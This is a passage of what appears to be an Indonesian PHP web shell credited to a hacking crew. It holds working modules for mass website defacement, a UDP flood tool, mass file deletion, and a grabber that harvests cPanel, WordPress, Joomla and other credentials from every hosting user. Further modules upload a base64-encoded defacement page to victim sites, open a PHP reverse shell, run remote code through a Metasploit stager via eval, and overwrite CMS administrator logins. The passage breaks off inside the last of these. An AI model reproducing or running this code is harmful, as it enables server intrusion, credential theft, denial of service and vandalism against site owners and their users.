  1373.    <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  1374.    <font style='text-decoration: underline;'>Folder:</font><br>
  1375.    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1376.    <font style='text-decoration: underline;'>Filename:</font><br>
  1377.    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1378.    <font style='text-decoration: underline;'>Index File:</font><br>
  1379.    <textarea name='script' style='width: 450px; height: 200px;'>LugiX Shell Code</textarea><br>
  1380.    <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1381.    </form></center>";
  1382.     }
  1383. } elseif($_GET['do'] == 'ddos') {
  1384. ?>
  1385. <html>
  1386. <form action=" " method="post">
  1387. <center><br><br><br>
  1388. Your IP: <font color="Lavender"><b><?php echo $my_ip; ?></b></font>�(Don't DoS yourself nub)<br><br>
  1389. <table class="tabnet" style="width:333px;padding:0 1px;">
  1390. <th colspan="5">Ddos Tool</th>
  1391. <tr><tr><td>IP Target</td><td>:</td>
  1392. <td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
  1393. </td></tr>
  1394. <tr><td>Time</td><td>:</td>
  1395. <td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
  1396. </td></tr>
  1397.  
  1398. <tr><td>Port</td><td>:</td>
  1399. <td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
  1400. </td></tr></tr></table></b><br>
  1401. <input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">
  1402. <br><br>
  1403. <center>
  1404. <font color="Lavender">Seteleh selesai menggunakan tools ini segera refresh browsingmu
  1405. </center>
  1406. </form>
  1407. </center>
  1408. <?php
  1409.     @$submit = $_POST['fire'];
  1410.     if (isset($submit)) {
  1411.         $packets = 0;
  1412.         $ip = $_POST['ip'];
  1413.         $rand = $_POST['port'];
  1414.         set_time_limit(0);
  1415.         ignore_user_abort(FALSE);
  1416.         $exec_time = $_POST['time'];
  1417.         $time = time();
  1418.         print "Flooded: $ip on port $rand <br><br>";
  1419.         $max_time = $time + $exec_time;
  1420.         for ($i = 0;$i < 65535;$i++) {
  1421.             $out.= "X";
  1422.         }
  1423.         while (1) {
  1424.             $packets++;
  1425.             if (time() > $max_time) {
  1426.                 break;
  1427.             }
  1428.             $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  1429.             if ($fp) {
  1430.                 fwrite($fp, $out);
  1431.                 fclose($fp);
  1432.             }
  1433.         }
  1434.         echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
  1435. ";
  1436.     }  
  1437. } elseif($_GET['do'] == 'mass_delete') {
  1438.     function hapus_massal($dir,$namafile) {
  1439.         if(is_writable($dir)) {
  1440.             $dira = scandir($dir);
  1441.             foreach($dira as $dirb) {
  1442.                 $dirc = "$dir/$dirb";
  1443.                 $lokasi = $dirc.'/'.$namafile;
  1444.                 if($dirb === '.') {
  1445.                     if(file_exists("$dir/$namafile")) {
  1446.                         unlink("$dir/$namafile");
  1447.                     }
  1448.                 } elseif($dirb === '..') {
  1449.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1450.                         unlink("".dirname($dir)."/$namafile");
  1451.                     }
  1452.                 } else {
  1453.                     if(is_dir($dirc)) {
  1454.                         if(is_writable($dirc)) {
  1455.                             if(file_exists($lokasi)) {
  1456.                                 echo "[<font color=blue>DELETED</font>] $lokasi<br>";
  1457.                                 unlink($lokasi);
  1458.                                 $idx = hapus_massal($dirc,$namafile);
  1459.                             }
  1460.                         }
  1461.                     }
  1462.                 }
  1463.             }
  1464.         }
  1465.     }
  1466.     if($_POST['start']) {
  1467.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1468.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  1469.         echo "</div>";
  1470.     } else {
  1471.     echo "<center>";
  1472.     echo "<form method='post'>
  1473.    <font style='text-decoration: underline;'>Folder:</font><br>
  1474.    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1475.    <font style='text-decoration: underline;'>Filename:</font><br>
  1476.    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1477.    <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  1478.    </form></center>";
  1479.     }
  1480. } elseif($_GET['do'] == 'config') {
  1481.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1482.     $idx = mkdir("idx_config", 0777);
  1483.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1484.     $htc = fopen("idx_config/.htaccess","w");
  1485.     fwrite($htc, $isi_htc);
  1486.     while($passwd = fgets($etc)) {
  1487.         if($passwd == "" || !$etc) {
  1488.             echo "<font color=red>Can't read /etc/passwd</font>";
  1489.         } else {
  1490.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1491.             foreach($user_config[1] as $user_idx) {
  1492.                 $user_config_dir = "/home/$user_idx/public_html/";
  1493.                 if(is_readable($user_config_dir)) {
  1494.                     $grab_config = array(
  1495.                         "/home/$user_idx/.my.cnf" => "cpanel",
  1496.                         "/home/$user_idx/.accesshash" => "WHM-accesshash",
  1497.                         "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  1498.                         "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  1499.                         "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  1500.                         "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  1501.                         "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1502.                         "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  1503.                         "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  1504.                         "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  1505.                         "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  1506.                         "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  1507.                         "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  1508.                         "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  1509.                         "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  1510.                         "/home/$user_idx/public_html/configuration.php" => "Joomla",
  1511.                         "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  1512.                         "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  1513.                         "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  1514.                         "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  1515.                         "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  1516.                         "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  1517.                     foreach($grab_config as $config => $nama_config) {
  1518.                         $ambil_config = file_get_contents($config);
  1519.                         if($ambil_config == '') {
  1520.                         } else {
  1521.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  1522.                             fputs($file_config,$ambil_config);
  1523.                         }
  1524.                     }
  1525.                 }      
  1526.             }
  1527.         }  
  1528.     }
  1529.     echo "<center><a href='?dir=$dir/idx_config'><font color=blue>Done</font></a></center>";
  1530. } elseif($_GET['do'] == 'jumping') {
  1531.     $i = 0;
  1532.     echo "<div class='margin: 5px auto;'>";
  1533.     if(preg_match("/hsphere/", $dir)) {
  1534.         $urls = explode("\r\n", $_POST['url']);
  1535.         if(isset($_POST['jump'])) {
  1536.             echo "<pre>";
  1537.             foreach($urls as $url) {
  1538.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  1539.                 $etc = "/etc/passwd";
  1540.                 $f = fopen($etc,"r");
  1541.                 while($gets = fgets($f)) {
  1542.                     $pecah = explode(":", $gets);
  1543.                     $user = $pecah[0];
  1544.                     $dir_user = "/hsphere/local/home/$user";
  1545.                     if(is_dir($dir_user) === true) {
  1546.                         $url_user = $dir_user."/".$url;
  1547.                         if(is_readable($url_user)) {
  1548.                             $i++;
  1549.                             $jrw = "[<font color=blue>R</font>] <a href='?dir=$url_user'><font color=lavender>$url_user</font></a>";
  1550.                             if(is_writable($url_user)) {
  1551.                                 $jrw = "[<font color=blue>RW</font>] <a href='?dir=$url_user'><font color=lavender>$url_user</font></a>";
  1552.                             }
  1553.                             echo $jrw."<br>";
  1554.                         }
  1555.                     }
  1556.                 }
  1557.             }
  1558.         if($i == 0) {
  1559.         } else {
  1560.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1561.         }
  1562.         echo "</pre>";
  1563.         } else {
  1564.             echo '<center>
  1565.                  <form method="post">
  1566.                  List Domains: <br>
  1567.                  <textarea name="url" style="width: 500px; height: 250px;">';
  1568.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1569.             while($getss = fgets($fp)) {
  1570.                 echo $getss;
  1571.             }
  1572.             echo  '</textarea><br>
  1573.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1574.                  </form></center>';
  1575.         }
  1576.     } elseif(preg_match("/vhosts/", $dir)) {
  1577.         $urls = explode("\r\n", $_POST['url']);
  1578.         if(isset($_POST['jump'])) {
  1579.             echo "<pre>";
  1580.             foreach($urls as $url) {
  1581.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  1582.                 if(is_dir($web_vh) === true) {
  1583.                     if(is_readable($web_vh)) {
  1584.                         $i++;
  1585.                         $jrw = "[<font color=blue>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1586.                         if(is_writable($web_vh)) {
  1587.                             $jrw = "[<font color=blue>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1588.                         }
  1589.                         echo $jrw."<br>";
  1590.                     }
  1591.                 }
  1592.             }
  1593.         if($i == 0) {
  1594.         } else {
  1595.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1596.         }
  1597.         echo "</pre>";
  1598.         } else {
  1599.             echo '<center>
  1600.                  <form method="post">
  1601.                  List Domains: <br>
  1602.                  <textarea name="url" style="width: 500px; height: 250px;">';
  1603.                   bing("ip:$ip");
  1604.             echo  '</textarea><br>
  1605.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1606.                  </form></center>';
  1607.         }
  1608.     } else {
  1609.         echo "<pre>";
  1610.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1611.         while($passwd = fgets($etc)) {
  1612.             if($passwd == '' || !$etc) {
  1613.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1614.             } else {
  1615.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1616.                 foreach($user_jumping[1] as $user_idx_jump) {
  1617.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1618.                     if(is_readable($user_jumping_dir)) {
  1619.                         $i++;
  1620.                         $jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=lavender>$user_jumping_dir</font></a>";
  1621.                         if(is_writable($user_jumping_dir)) {
  1622.                             $jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=lavender>$user_jumping_dir</font></a>";
  1623.                         }
  1624.                         echo $jrw;
  1625.                         if(function_exists('posix_getpwuid')) {
  1626.                             $domain_jump = file_get_contents("/etc/named.conf");  
  1627.                             if($domain_jump == '') {
  1628.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1629.                             } else {
  1630.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1631.                                 foreach($domains_jump[1] as $dj) {
  1632.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1633.                                     $user_jumping_url = $user_jumping_url['name'];
  1634.                                     if($user_jumping_url == $user_idx_jump) {
  1635.                                         echo " => ( <u>$dj</u> )<br>";
  1636.                                         break;
  1637.                                     }
  1638.                                 }
  1639.                             }
  1640.                         } else {
  1641.                             echo "<br>";
  1642.                         }
  1643.                     }
  1644.                 }
  1645.             }
  1646.         }
  1647.         if($i == 0) {
  1648.         } else {
  1649.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1650.         }
  1651.         echo "</pre>";
  1652.     }
  1653.     echo "</div>";
  1654. } elseif($_GET['do'] == 'autoklik') {
  1655. ?>
  1656. <form method="post">
  1657. <input type="submit" name="x" value="index.php">
  1658. </form>
  1659. <?php
  1660. $target = explode("\r\n", $_POST['target']);
  1661. if($_POST['x']) {
  1662.     foreach($target as $korban) {
  1663.         $global = "index.php";
  1664.         $isi_nama_doang = "PGh0bWwgbGFuZz0iZW4tVVMiPjxoZWFkPjx0aXRsZT5OdXNhbnRhcmEgNDUgSGFja2VyIFRlYW08L3RpdGxlPjwhLS0tQnkgTXIueDB4IERvbm50IENvcGFzIEN1ayAtLT4NCjxtZXRhIHByb3BlcnR5PSJvZzp0aXRsZSIgY29udGVudD0iV2FzIEhlcmUiPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50PSJ+IE40NUhUIH4iPg0KPG1ldGEgcHJvcGVydHk9Im9nOmF1dGhvciIgY29udGVudD0iTXIueDB4Ij4NCg0KPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KDQoNCjxzdHlsZT5ib2R5e2JhY2tncm91bmQ6IzAwMDtmb250LWZhbWlseTpDb3VyaWVyIG5ldzt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjojZmZmO31wcmV7bWFyZ2luLXRvcDoxJTsNCiAgICAgICBjdXJzb3I6IHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3VyLTkvY3VyODYyLmFuaSksIHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3VyLTkvY3VyODYyLnBuZyksIHByb2dyZXNzICFpbXBvcnRhbnQ7DQp9DQpmb250IHtib3gtc2hhZG93OiAwIDAgMTBweCBkYXJrYmx1ZTt9DQoNCiA8L3N0eWxlPg0KDQoNCjwvaGVhZD48Ym9keSBvbmNvbnRleHRtZW51PSJyZXR1cm4gZmFsc2UiIG9ua2V5ZG93bj0icmV0dXJuIGZhbHNlIiBvbm1vdXNlZG93bj0icmV0dXJuIGZhbHNlIj48YnI+PGJyPjxicj4NCjxjZW50ZXI+PGltZyBzdHlsZT0id2lkdGg6MzIwcHg7IiBzcmM9Imh0dHBzOi8vMi5icC5ibG9nc3BvdC5jb20vLW8wR2RNeUVoOWx3L1dHX2hWVFdaUU1JL0FBQUFBQUFBQXdVL0M4VkF0aXFaU25FbzZPX2s2dkg4WnJZTHByRTA3czBMZ0NMY0IvczE2MDAvTjQ1SFQlMkIlMjUyODIlMjUyOS5wbmciPjwvY2VudGVyPg0KICAgICAgDQogICAgICANCgkgIDxicj4NCiAgICAgIDxicj4NCiAgICANCgkgIA0KICAgICAgICAgPG1hcnF1ZWUgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSIzIiB3aWR0aD0iNDUlIiBzdHlsZT0id2lkdGg6IDQ1JTsiPkRpc2NvdmVyaW5nIEFuZCBFeHBsb2l0aW5nIFNlY3VyaXR5IEZsYXdzPC9tYXJxdWVlPg0KPHByZT48Zm9udCBjb2xvcj0icmVkIj5bPC9mb250Pk40NUhUIE9mZmljaWFsIE5pY2s8Zm9udCBjb2xvcj0icmVkIj5dPC9mb250Pg0KDQp8IElkYVJhaG1hIHwgS2lsbCBNZSB8IEJyb2tlbiBBbmdlbCB8IFNoaW5DaGFuIHwgLi9Nci5CbGFuazAwNyB8IFNDWVRIRTQwNF9MT0wgfCBQRVRSMDNYIHwgUjN4WW4tMDFgIHwgSjROQzBLIHwgRlJVXzQwMyB8IGthc2lhbiB8IE1SWSANCnwgc2lsdW1hbi5uYW5hcyB8IC9tci5BbmRybzBURkwgfCBUcmlwbGUgQSB8IE5vb2JfT3JiIHwgQk9DQUggS1JJTUlOQUwgfCByMDA3QHVua24wd24gfCBNclg0MDQgfCBNaXN0ZXJzJCB8IEFic1RyYXggfCBJbmlzaWFsLUMgDQp8IHVzZXI5OCB8IEplcnVrSUQyNyB8IFRpbmFtYVRfVGVhTSB8IE1yLiBTM1BVTDBIIHwgTVIuVTEzIHwgRGFya19PcmFjbGUgfCBNci4geDB4IHwgTXIuQ3I0YnMgfCBTZXh5R2lyIHwgQmFuZ0RlYmJ6IHwgQ0tNXzUwMSB8IEFuZCBBbGwgVGVhbSBONDVIVCB8DQogPC9wcmU+DQoJICAgICAgICANCgkgPGJyPiAJICANCjxmb250IGNvbG9yPSJ3aGl0ZSIgc2l6ZT0iMiI+VGhhbmtzIFRvKiA6IE40NUhUICwgU2hpbkNoYW4gLFBFVFIwM1ggLCBSaW50byBBUiA8L2ZvbnQ+DQo8YnI+Izw/cGhwDQokaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCmVjaG8gIiBZb3VyIElQOiAkaXAgIjsNCj8+DQogICANCiAgICAgDQogPC9ib2R5PjwvaHRtbD4=";
  1665.         $decode_isi = base64_decode($isi_nama_doang);
  1666.         $encode = base64_encode($global);
  1667.         $ss = fopen($global,"w");
  1668.         fputs($ss, $decode_isi);
  1669.         echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  1670.         echo "Done index.php<br>";
  1671.         $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw";
  1672.         $post1 = array(
  1673.                 "target" => "l1_$encode",
  1674.                 "content" => "$decode_isi",);
  1675.         $post2 = array( "upload[]" => "@$global",);
  1676.         $output_mkfile = ngirim("$korban", $post1);
  1677.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  1678.             }
  1679.         }
  1680. ?>
  1681. <form method="post">
  1682. <input type="submit" name="s" value="N45HT.php">
  1683. </form>
  1684. <?php
  1685. $targets = explode("\r\n", $_POST['targets']);
  1686. if($_POST['s']) {
  1687.     foreach($targets as $korba) {
  1688.         $globa = "N45HT.php";
  1689.         $isi_nama = "PGh0bWwgbGFuZz0iZW4tVVMiPjxoZWFkPjx0aXRsZT5OdXNhbnRhcmEgNDUgSGFja2VyIFRlYW08L3RpdGxlPjwhLS0tQnkgTXIueDB4IERvbm50IENvcGFzIEN1ayAtLT4NCjxtZXRhIHByb3BlcnR5PSJvZzp0aXRsZSIgY29udGVudD0iV2FzIEhlcmUiPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50PSJ+IE40NUhUIH4iPg0KPG1ldGEgcHJvcGVydHk9Im9nOmF1dGhvciIgY29udGVudD0iTXIueDB4Ij4NCg0KPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KDQoNCjxzdHlsZT5ib2R5e2JhY2tncm91bmQ6IzAwMDtmb250LWZhbWlseTpDb3VyaWVyIG5ldzt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjojZmZmO31wcmV7bWFyZ2luLXRvcDoxJTsNCiAgICAgICBjdXJzb3I6IHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3VyLTkvY3VyODYyLmFuaSksIHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3VyLTkvY3VyODYyLnBuZyksIHByb2dyZXNzICFpbXBvcnRhbnQ7DQp9DQpmb250IHtib3gtc2hhZG93OiAwIDAgMTBweCBkYXJrYmx1ZTt9DQoNCiA8L3N0eWxlPg0KDQoNCjwvaGVhZD48Ym9keSBvbmNvbnRleHRtZW51PSJyZXR1cm4gZmFsc2UiIG9ua2V5ZG93bj0icmV0dXJuIGZhbHNlIiBvbm1vdXNlZG93bj0icmV0dXJuIGZhbHNlIj48YnI+PGJyPjxicj4NCjxjZW50ZXI+PGltZyBzdHlsZT0id2lkdGg6MzIwcHg7IiBzcmM9Imh0dHBzOi8vMi5icC5ibG9nc3BvdC5jb20vLW8wR2RNeUVoOWx3L1dHX2hWVFdaUU1JL0FBQUFBQUFBQXdVL0M4VkF0aXFaU25FbzZPX2s2dkg4WnJZTHByRTA3czBMZ0NMY0IvczE2MDAvTjQ1SFQlMkIlMjUyODIlMjUyOS5wbmciPjwvY2VudGVyPg0KICAgICAgDQogICAgICANCgkgIDxicj4NCiAgICAgIDxicj4NCiAgICANCgkgIA0KICAgICAgICAgPG1hcnF1ZWUgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSIzIiB3aWR0aD0iNDUlIiBzdHlsZT0id2lkdGg6IDQ1JTsiPkRpc2NvdmVyaW5nIEFuZCBFeHBsb2l0aW5nIFNlY3VyaXR5IEZsYXdzPC9tYXJxdWVlPg0KPHByZT48Zm9udCBjb2xvcj0icmVkIj5bPC9mb250Pk40NUhUIE9mZmljaWFsIE5pY2s8Zm9udCBjb2xvcj0icmVkIj5dPC9mb250Pg0KDQp8IElkYVJhaG1hIHwgS2lsbCBNZSB8IEJyb2tlbiBBbmdlbCB8IFNoaW5DaGFuIHwgLi9Nci5CbGFuazAwNyB8IFNDWVRIRTQwNF9MT0wgfCBQRVRSMDNYIHwgUjN4WW4tMDFgIHwgSjROQzBLIHwgRlJVXzQwMyB8IGthc2lhbiB8IE1SWSANCnwgc2lsdW1hbi5uYW5hcyB8IC9tci5BbmRybzBURkwgfCBUcmlwbGUgQSB8IE5vb2JfT3JiIHwgQk9DQUggS1JJTUlOQUwgfCByMDA3QHVua24wd24gfCBNclg0MDQgfCBNaXN0ZXJzJCB8IEFic1RyYXggfCBJbmlzaWFsLUMgDQp8IHVzZXI5OCB8IEplcnVrSUQyNyB8IFRpbmFtYVRfVGVhTSB8IE1yLiBTM1BVTDBIIHwgTVIuVTEzIHwgRGFya19PcmFjbGUgfCBNci4geDB4IHwgTXIuQ3I0YnMgfCBTZXh5R2lyIHwgQmFuZ0RlYmJ6IHwgQ0tNXzUwMSB8IEFuZCBBbGwgVGVhbSBONDVIVCB8DQogPC9wcmU+DQoJICAgICAgICANCgkgPGJyPiAJICANCjxmb250IGNvbG9yPSJ3aGl0ZSIgc2l6ZT0iMiI+VGhhbmtzIFRvKiA6IE40NUhUICwgU2hpbkNoYW4gLFBFVFIwM1ggLCBSaW50byBBUiA8L2ZvbnQ+DQo8YnI+Izw/cGhwDQokaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCmVjaG8gIiBZb3VyIElQOiAkaXAgIjsNCj8+DQogICANCiAgICAgDQogPC9ib2R5PjwvaHRtbD4=";
  1690.         $decode_isi = base64_decode($isi_nama);
  1691.         $encode = base64_encode($globa);
  1692.         $ss = fopen($globa,"w");
  1693.         fputs($ss, $decode_isi);
  1694.         echo "[+] <a href='$korban' targets='_blank'>$korba</a> <br>";
  1695.         echo "Done N45HT.php<br>";
  1696.         $url_mkfil = "$korba?cmd=mkfile&name=$globa&targets=l1_Lw";
  1697.         $post1 = array(
  1698.                 "targets" => "l1_$encode",
  1699.                 "content" => "$decode_isi",);
  1700.         $post2 = array( "upload[]" => "@$globa",);
  1701.         $output_mkfil = ngirim("$korban", $post1);
  1702.             $upload_as = ngirim("$korban?cmd=upload", $post2);
  1703.             }
  1704.         }
  1705.  
  1706. } elseif($_GET['do'] == 'tool') {
  1707. error_reporting(0);
  1708. function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
  1709. $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='blue'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
  1710. echo $s_result;
  1711. if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
  1712. if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
  1713. if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
  1714. if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
  1715. if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
  1716. umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
  1717. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  1718. $process = proc_open($shell, $descriptorspec, $pipes);
  1719. if(!is_resource($process)) exit(1);
  1720. stream_set_blocking($pipes[0], 0);
  1721. stream_set_blocking($pipes[1], 0);
  1722. stream_set_blocking($pipes[2], 0);
  1723. stream_set_blocking($sock, 0);
  1724. while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  1725. if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
  1726. if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
  1727. if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}
  1728. } elseif($_GET['do'] == 'auto_edit_user') {
  1729.     if($_POST['hajar']) {
  1730.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1731.             echo "username atau password harus lebih dari 6 karakter";
  1732.         } else {
  1733.             $user_baru = $_POST['user_baru'];
  1734.             $pass_baru = md5($_POST['pass_baru']);
  1735.             $conf = $_POST['config_dir'];
  1736.             $scan_conf = scandir($conf);
  1737.             foreach($scan_conf as $file_conf) {
  1738.                 if(!is_file("$conf/$file_conf")) continue;
  1739.                 $config = file_get_contents("$conf/$file_conf");
  1740.                 if(preg_match("/JConfig|joomla/",$config)) {
  1741.                     $dbhost = ambilkata($config,"host = '","'");
  1742.                     $dbuser = ambilkata($config,"user = '","'");
  1743.                     $dbpass = ambilkata($config,"password = '","'");
  1744.                     $dbname = ambilkata($config,"db = '","'");
  1745.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1746.                     $prefix = $dbprefix."users";
  1747.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1748.                     $db = mysql_select_db($dbname);
  1749.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1750.                     $result = mysql_fetch_array($q);
  1751.                     $id = $result['id'];
  1752.                     $site = ambilkata($config,"sitename = '","'");
  1753.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1754.                     echo "Config => ".$file_conf."<br>";
  1755.                     echo "CMS => Joomla<br>";
  1756.                     if($site == '') {
  1757.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1758.                     } else {
  1759.                         echo "Sitename => $site<br>";
  1760.                     }
  1761.                     if(!$update OR !$conn OR !$db) {
  1762.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1763.                     } else {
